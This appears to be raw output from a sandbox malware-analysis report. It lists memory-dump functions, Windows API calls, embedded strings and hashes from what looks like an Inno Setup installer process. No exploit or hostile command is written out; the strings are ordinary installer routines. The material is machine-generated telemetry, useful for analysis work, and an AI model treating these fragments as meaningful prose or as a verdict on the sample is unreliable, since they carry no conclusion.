                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$Load
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $ $Internal error: Item already expanding
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1675784387-1948079669
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: "*G$"*G
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2066263336-450946878
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ab88a2058fedbe1f7e6c7f1e41183f8997bb8702fc8fab432acd6a1ab89d893
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ab88a2058fedbe1f7e6c7f1e41183f8997bb8702fc8fab432acd6a1ab89d893
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 390214022-3304407042
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b78ede8a23c37cfcf17a9c456894b4a3e9d266ee139fb23f8432ab3fcd8b7dcf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b78ede8a23c37cfcf17a9c456894b4a3e9d266ee139fb23f8432ab3fcd8b7dcf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                                                                                                                                                                                                                                                                                                  • 73EA59E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClassInfoMessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1455646776-4234151509
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
  • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
  • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
  • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
  • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
  • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
  • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
  • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa3fccad9696b9b6bfe68c7e7db975784c1698b69a6a0deee302da45e735cd6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa3fccad9696b9b6bfe68c7e7db975784c1698b69a6a0deee302da45e735cd6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                                                                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                                                                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                                                                                                                                                                                                                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1030595962-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                                                                                                                                                                                                                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Stretch$E98830$A4620BitsE922Mode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4209919087-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                                                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 004571EB
                                                                                                                                                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
                                                                                                                                                                                                                                                                                                                                                                  • String ID: [Paused]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1715333840-4230553315
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c251432b2b9717db29caccd575644049c995f8e01b18ed466c2c44b837bc0c04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c251432b2b9717db29caccd575644049c995f8e01b18ed466c2c44b837bc0c04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$LoadSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CheckPassword
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4023313301-1302249611
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 87cc9812f09c28c00cc453431652c7e94549ccc14077da35b47ea6f498850ed3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87cc9812f09c28c00cc453431652c7e94549ccc14077da35b47ea6f498850ed3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477C02
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                                                                                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 613034392-3771334282
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
Strings
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
• Failed to load .NET Framework DLL "%s", xrefs: 00459B88
• Fusion.dll, xrefs: 00459B43
• CreateAssemblyCache, xrefs: 00459B9A
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
• API String ID: 190572456-3990135632
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
• GetFocus.USER32 ref: 0041C178
• 73E9A570.USER32(?), ref: 0041C184
• 73E98830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
• 73E922A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
